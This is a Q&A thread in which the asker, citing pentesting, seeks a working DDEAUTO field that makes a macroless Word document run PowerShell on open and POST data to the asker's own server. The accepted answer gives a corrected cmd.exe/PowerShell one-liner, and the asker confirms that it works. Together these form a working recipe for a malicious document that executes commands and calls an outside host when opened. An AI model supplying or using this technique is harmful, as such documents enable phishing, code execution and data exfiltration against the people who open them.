# Sending post data through DDEAUTO MS Word

Tags: windows, powershell, ms-word

I'm doing some pentesting and want to get a macroless word document to ping back to my server.

I know it has been done precedently through a payload (see https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/), but the goal here would be not to run anything more than a request.

My goal here would be to run something along the lines of :

```
Invoke-WebRequest -UseBasicParsing http://myip -ContentType "application/json" -Method POST -Body "{ 'Item':'word', 'id':1}"
```

from the DDEAUTO command (https://msdn.microsoft.com/en-us/library/ff531181(v=office.12).aspx).

I tried executing powershell through cmd, powershell directly, and did not manage to get any results

I would have expected something along the lines of :

```
DDEAUTO c:\\Windows\\System32\\cmd.exe "powershell -e Invoke-WebRequest -UseBasicParsing http://myip -ContentType "application/json" -Method POST -Body "{ 'Item':3661515, 'Name':'test'}"" \p
```

to be working, but it doesn't seem to be the case.

Thank you !

Answer (score 0, accepted):

You should be using something like,

**/k** will keep the Command line open after it runs the command. Feel free to remove this if you want the cmd to close automatically after command

**-command** to specify command

**{}** hash table **no need** to put this in quotes

**{key:value;key:value}** the **;** is the separator **not a ,**

```
cmd.exe "/k powershell -command Invoke-WebRequest -UseBasicParsing http://google.com -ContentType 'application/json' -Method POST -Body { Item:3661515; Name:'test'}"
```

Comment: `key=value`, not `key:value` - PowerShell is not json :-)

Comment: That is exactly what I was looking for ! 

It indeed works (just tried it out), and even though it does not really send a Json it's fine for what i'm doing.

Not used to play around with windows, thanks a lot !